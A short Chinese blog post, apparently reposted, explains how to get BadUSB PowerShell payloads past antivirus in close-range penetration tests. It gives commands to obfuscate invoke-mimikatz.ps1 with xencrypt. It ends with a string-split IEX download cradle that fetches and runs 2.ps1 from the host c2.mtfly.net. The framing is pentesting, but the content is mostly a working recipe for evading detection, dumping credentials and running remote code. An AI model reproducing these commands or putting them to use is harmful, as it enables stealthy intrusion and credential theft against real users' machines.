其他分享
首页 > 其他分享> > 关于近源渗透测试的免杀

关于近源渗透测试的免杀

作者:互联网

近源渗透测试badusb执行代码的免杀

在进行近源渗透测试的时候,我们发现国内杀软对powershell的管制非常的严格,只要有后台隐藏执行的powershell都会触发可疑行为警报,但是这不代表不能绕过。
powershell.png

生成powershell payload

如图生成payload,我们使用powershell的payload,就不用勾选64位了
TIM图片20200415192803.png

powershell混淆

接下来做混淆,否则ps脚本下载下来也是被杀软秒杀的,可以使用InvokeObfuscation或者xencrypt。
我这里使用的是xencrypt

Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 68

可以选择免杀68次
https://github.com/the-xentropy/xencrypt

badusb运行脚本拆分免杀

由于免杀后的脚本会很大,所以我们可以用powershell IEX(New-Object Net.WebClient).DownloadString("http://x.x.x.x/2.ps1")从服务器下载ps脚本运行,但是会被杀软杀,所以可以用拆分免杀。

powershell.exe ”$a1='IEX ((new-objectnet.webclient).downl';$a2='oadstring(''http://c2.mtfly.net/2.ps1''))';$a3="$a1,$a2";IEX(-join $a3)""

标签:近源,xencrypt,免杀,IEX,渗透,payload,ps1,powershell
来源: https://www.cnblogs.com/w0x68y/p/12707468.html